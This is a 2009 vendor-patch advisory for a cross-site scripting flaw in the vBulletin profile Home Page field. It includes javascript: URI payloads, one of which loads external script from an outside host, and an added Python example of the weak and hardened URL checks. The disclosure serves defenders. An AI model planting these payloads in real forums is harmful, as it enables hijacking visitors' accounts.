vBulletin - Cross Site Script Redirection
Posted 13 October 2009, 9:00 AM


Versions Affected: 3.8.4 / 3.7.6 / 3.6.12
Patches Available: 3.8.4PL1 / 3.7.6PL1 / 3.6.12PL1

Info: An XSS flaw within the user profile page has recently been discovered.
This could allow an attacker to carry out an action as a user or obtain
access to a user's account. To resolve this issue, it has been necessary to
release a patch level version of the active versions of vBulletin.

The upgrade process is the same as previous patch level releases - simply
download the patch from the Members Area, extract the files and upload to
your webserver, overwriting the existing files. There is no upgrade script
required.

As with all security-based releases, we recommend that all customers
upgrade as soon as possible in order to prevent any potential damage
resulting from the flaw being exploited.

Credits: The original finder of the security hole. (Jelsoft?)

Researched & Disclosed by: MaXe (InterN0T.net)

Official Information:
http://www.vbulletin.com/forum/showthread.php?t=319572


-:: The Advisory ::-
The "Home Page" field in the user profile was only checking the user input
for either "www" or the following regular expression written in normal text:
Any letter from A to Z and/or a number from 0-9 + :// will make the link valid.

The output of the Home Page field is encoded, most likely with htmlspecialchars();
however, before the patch it did not check whether a user had created a link that
would send an unwitting visitor to the data: or javascript: URI scheme.

The only limits on the Home Page field are:
- a 90 character limit
- special characters are converted to HTML entities
- only the data: or javascript: URI scheme can be used.

This means that we should avoid " since that becomes &quot;. Other characters
like < become &lt;, which is %3C when URL-encoded, which is almost the same.
See how htmlentities() and htmlspecialchars() work in PHP.

The following input, entered as the home page, will alert 0:
javascript://%0adocument.write('<script>alert(0)</script>')

The following input is a proof of concept showing that external JavaScript can be loaded:
javascript://%0adocument.write('<script src=http://intern0t.net/.k></script>')

The following URL contains a working Proof of Concept on the Contact Page:
http://forum.intern0t.net/members/maxe.html (will be removed soon)
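The weak check and a hardened replacement, as an added Python example that is not part of this advisory or of vBulletin's PHP code base. The pre-patch regex is reconstructed from the description above and is an assumption; the advisory's own PoC string is used only as a test vector to show that output encoding alone does not stop it, while scheme validation does.

```python
import html
import re
from urllib.parse import unquote, urlsplit

# Reconstruction of the pre-patch rule as the advisory describes it (the exact
# regex is an assumption): accept if the value starts with "www" or begins with
# letters/digits followed by "://".
WEAK_SCHEME_RE = re.compile(r"^[A-Za-z0-9]+://")
HOME_PAGE_MAX_LEN = 90  # the 90-character limit quoted in the advisory
HREF_RE = re.compile(r'href="([^"]*)"')


def weak_home_page_check(value: str) -> bool:
    """Pre-patch style check: it only looks at how the string begins."""
    if len(value) > HOME_PAGE_MAX_LEN:
        return False
    return value.startswith("www") or WEAK_SCHEME_RE.match(value) is not None


def strict_home_page_check(value: str) -> bool:
    """Hardened check: percent-decode, then allow only http(s) URLs with a host."""
    if len(value) > HOME_PAGE_MAX_LEN:
        return False
    decoded = unquote(value)
    # The PoC smuggles a newline as %0a; reject any control character outright.
    if any(ord(ch) < 0x20 or ch == "\x7f" for ch in decoded):
        return False
    parts = urlsplit(decoded)
    return parts.scheme.lower() in ("http", "https") and bool(parts.netloc)


def render_home_page_link(value: str) -> str:
    """Output stage as the advisory assumes vBulletin does it (htmlspecialchars)."""
    escaped = html.escape(value, quote=True)
    return '<a href="%s">%s</a>' % (escaped, escaped)


def browser_href_from_link(anchor: str) -> str:
    """What the browser navigates to: the href attribute after entity decoding."""
    match = HREF_RE.search(anchor)
    return html.unescape(match.group(1)) if match else ""
```

The entity-encoded anchor contains no raw `<script>`, yet after attribute decoding the browser still sees the original javascript: URL, which is why the fix has to be on the scheme, not on the output encoding.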

-:: Solution ::-
Update to the newest version of vBulletin - 3.8.4PL1 / 3.7.6PL1 / 3.6.12PL1

-:: Conclusion ::-
vBulletin is generally a safe and secure platform to use for large forums.
In practice, this security hole is unlikely to be successfully exploited against real users.
Please see: http://forum.intern0t.net/blogs/maxe/62-having-fun-cross-site-scripting.html for in-depth information.

Disclosure Information:
- Unknown date of when the vendor found the security hole.
- Vendor released patch on the 7th October 2009.
- Security hole researched and disclosed on 8th October 2009.

Disclosure Reference:
http://forum.intern0t.net/exploits-vulnerabilities-pocs/1502-vbulletin-3-8-4-cross-site-script-redirection.html


All of the best,